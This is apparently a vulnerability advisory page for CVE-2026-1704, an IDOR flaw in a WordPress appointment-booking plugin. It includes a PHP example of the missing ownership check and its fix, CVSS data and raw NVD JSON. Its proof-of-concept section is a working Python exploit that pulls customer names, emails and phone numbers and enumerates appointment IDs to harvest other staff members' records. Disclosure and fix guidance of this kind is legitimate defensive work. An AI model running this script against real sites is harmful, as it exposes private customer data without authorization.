Security Vulnerability Report
CVE-2026-1704 CVSS 4.3 MEDIUM

CVE-2026-1704

Published: 2026-03-13 19:53:59
Last Modified: 2026-04-22 21:30:26

Description

The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.9.29. This is due to the `get_item_permissions_check` method granting access to users with the `ssa_manage_appointments` capability without validating staff ownership of the requested appointment. This makes it possible for authenticated attackers, with custom-level access and above (users granted the ssa_manage_appointments capability, such as Team Members), to view appointment records belonging to other staff members and access sensitive customer personally identifiable information via the appointment ID parameter.
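The defect the advisory describes is an object-level authorization gap: the REST route's permission callback answers "does this user hold `ssa_manage_appointments`?" but never asks "does this user own appointment `id`?". The following PHP is an added illustration of that gap beside a hardened form, written for this report; it is not the plugin's own code, and the controller class name, the `ssa_get_appointment_owner()` helper, the `staff_id` column and the use of `manage_options` to mark users who may read every appointment are all assumptions.

```php
<?php
/**
 * Example permission callback for a "GET /wp-json/ssa/v1/appointments/<id>" route.
 * Added for this report as an illustration of the CWE-639 fix pattern; it is not
 * the plugin's implementation. Class name, helper and column names are assumed.
 */
class Example_Appointment_Rest_Controller {

	/**
	 * The vulnerable shape the advisory describes: a capability check alone
	 * decides access, so any user holding the capability (e.g. a Team Member)
	 * can read any appointment simply by changing the ID in the URL.
	 */
	public function get_item_permissions_check_vulnerable( WP_REST_Request $request ) {
		return current_user_can( 'ssa_manage_appointments' );
	}

	/**
	 * Hardened shape: the same capability check, followed by an object-level
	 * ownership check against the appointment actually being requested.
	 */
	public function get_item_permissions_check( WP_REST_Request $request ) {
		if ( ! current_user_can( 'ssa_manage_appointments' ) ) {
			return new WP_Error(
				'rest_forbidden',
				__( 'Sorry, you are not allowed to view appointments.' ),
				array( 'status' => rest_authorization_required_code() )
			);
		}

		// Assumption for this example: users with manage_options may read
		// every staff member's appointments.
		if ( current_user_can( 'manage_options' ) ) {
			return true;
		}

		// The {id} URL segment arrives as a request parameter; coerce it to a
		// non-negative integer before using it in any lookup.
		$appointment_id = absint( $request->get_param( 'id' ) );
		$owner_user_id  = ssa_get_appointment_owner( $appointment_id );

		// Deny both "not yours" and "does not exist" with the same status so the
		// response does not confirm which appointment IDs are valid.
		if ( 0 === $owner_user_id || $owner_user_id !== get_current_user_id() ) {
			return new WP_Error(
				'rest_forbidden',
				__( 'Sorry, you are not allowed to view this appointment.' ),
				array( 'status' => 403 )
			);
		}

		return true;
	}
}

/**
 * Assumed helper: resolves the WordPress user ID of the staff member who owns
 * an appointment, or 0 when no such appointment exists. The table and column
 * names are placeholders for this example, not the plugin's schema.
 */
function ssa_get_appointment_owner( int $appointment_id ): int {
	global $wpdb;
	$table = $wpdb->prefix . 'ssa_appointments'; // assumed table name
	$staff = $wpdb->get_var(
		$wpdb->prepare( "SELECT staff_id FROM {$table} WHERE id = %d", $appointment_id ) // assumed column
	);
	return (int) $staff;
}
```

WordPress invokes the hardened method through the `permission_callback` argument of `register_rest_route()`, before the route's data handler runs, so the ownership decision is made once per request and the handler never sees a foreign appointment ID. The same check belongs on every other per-item route (update, delete) that keys on an appointment ID, since a capability test alone is insufficient for any of them.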

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Simply Schedule Appointments Plugin < 1.6.9.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-1704 PoC - IDOR in Simply Schedule Appointments Plugin
# Target: WordPress site with Simply Schedule Appointments plugin < 1.6.9.30


def exploit_idor(target_url, target_appointment_id, auth_cookie):
    """
    Exploit IDOR vulnerability to access other staff members' appointments

    Args:
        target_url: Target WordPress site URL
        target_appointment_id: ID of appointment to access (can be any valid ID)
        auth_cookie: WordPress authentication cookie with ssa_manage_appointments capability
    """
    # REST API endpoint for appointment retrieval
    endpoint = f"{target_url}/wp-json/ssa/v1/appointments/{target_appointment_id}"

    headers = {
        'Cookie': auth_cookie,
        'Content-Type': 'application/json',
        'X-WP-Nonce': 'YOUR_REST_API_NONCE',  # Obtain from page source
    }

    print(f"[*] Target: {endpoint}")
    print(f"[*] Requesting appointment ID: {target_appointment_id}")

    try:
        response = requests.get(endpoint, headers=headers, timeout=10)

        if response.status_code == 200:
            data = response.json()
            print("[+] SUCCESS! Retrieved appointment details:")
            print(f"    Customer Name: {data.get('customer_name', 'N/A')}")
            print(f"    Customer Email: {data.get('customer_email', 'N/A')}")
            print(f"    Customer Phone: {data.get('customer_phone', 'N/A')}")
            print(f"    Appointment Date: {data.get('start', 'N/A')}")
            return True
        elif response.status_code == 403:
            print("[-] Access denied - check permissions")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

    # Every non-200 path (403, other status, transport error) ends here
    return False


# Brute force appointment IDs to find records from other staff
def enumerate_appointments(target_url, auth_cookie, start_id=1, end_id=1000):
    """
    Enumerate appointment IDs to discover other staff members' appointments
    """
    print(f"[*] Enumerating appointment IDs from {start_id} to {end_id}")
    for appt_id in range(start_id, end_id + 1):
        if exploit_idor(target_url, appt_id, auth_cookie):
            print(f"[!] Found accessible appointment ID: {appt_id}")


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2026-1704-poc.py <target_url> <appointment_id> <auth_cookie>")
        print("Example: python cve-2026-1704-poc.py https://example.com 123 'wordpress_logged_in_xxx='")
        sys.exit(1)

    target = sys.argv[1]
    appt_id = int(sys.argv[2])
    cookie = sys.argv[3]

    exploit_idor(target, appt_id, cookie)
```

References

https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-appointment-model.php#L1348
https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-appointment-model.php#L1436
https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-model.php#L1348
https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-model.php#L1436
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480506%40simply-schedule-appointments%2Ftrunk&old=3475885%40simply-schedule-appointments%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/c82f3864-13af-4ff6-824a-4c799a98f3f6?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-1704",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:53:58.680",
    "lastModified": "2026-04-22T21:30:26.497",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.9.29. This is due to the `get_item_permissions_check` method granting access to users with the `ssa_manage_appointments` capability without validating staff ownership of the requested appointment. This makes it possible for authenticated attackers, with custom-level access and above (users granted the ssa_manage_appointments capability, such as Team Members), to view appointment records belonging to other staff members and access sensitive customer personally identifiable information via the appointment ID parameter."
      },
      {
        "lang": "es",
        "value": "El plugin Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin para WordPress es vulnerable a la Referencia Directa Insegura a Objetos en todas las versiones hasta la 1.6.9.29, inclusive. Esto se debe a que el método 'get_item_permissions_check' otorga acceso a usuarios con la capacidad 'ssa_manage_appointments' sin validar la propiedad del personal sobre la cita solicitada. Esto hace posible que atacantes autenticados, con acceso de nivel personalizado y superior (usuarios a los que se les ha otorgado la capacidad ssa_manage_appointments, como los Miembros del Equipo), puedan ver registros de citas pertenecientes a otros miembros del personal y acceder a información personal identificable sensible del cliente a través del parámetro de ID de cita."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-appointment-model.php#L1348", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-appointment-model.php#L1436", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-model.php#L1348", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-model.php#L1436", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480506%40simply-schedule-appointments%2Ftrunk&old=3475885%40simply-schedule-appointments%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c82f3864-13af-4ff6-824a-4c799a98f3f6?source=cve", "source": "[email protected]"}
    ]
  }
}
```